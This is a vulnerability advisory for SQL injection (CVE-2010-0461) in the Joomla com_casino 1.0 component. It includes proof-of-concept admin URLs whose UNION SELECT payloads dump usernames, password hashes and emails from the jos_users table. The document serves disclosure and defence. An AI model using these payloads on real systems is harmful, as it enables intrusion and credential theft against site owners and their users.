Topic : | Joomla (com_casino) 1.0 SQL Injection Vulnerabilities
|
SecurityAlert : 6989
CVE : CVE-2010-0461
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : B-HUNT3|2
Published : 01.02.2010
Affected Software : | joomla:com_casino:1.0 |
 Advisory Content : [~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> TITLE: Joomla (com_casino) SQL Injection Vulnerabilities
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost
[~]>> PRE-REQUERIMENTS: Privileged user
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.0
[~]>> RISK: Low/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> PROOFS OF CONCEPT:
[~]>>
http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=
category&id=[SQL]
[~]>>
http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=
player&id=[SQL]
[~]>>
http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=
category&id=-1%27+union+all+select+1,username,password,4,5+from+jos_users/*
[~]>>
http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=
player&id=-1%27+union+all+select+1,2,password,email,@@version,database(),us
er(),username+from+jos_users/*
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> ...[END ADVISORY]...
References :
http://xforce.iss.net/xforce/xfdb/55846
http://www.securityfocus.com/bid/37938
http://www.exploit-db.com/exploits/11237
http://packetstormsecurity.org/1001-exploits/joomlacasino1-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|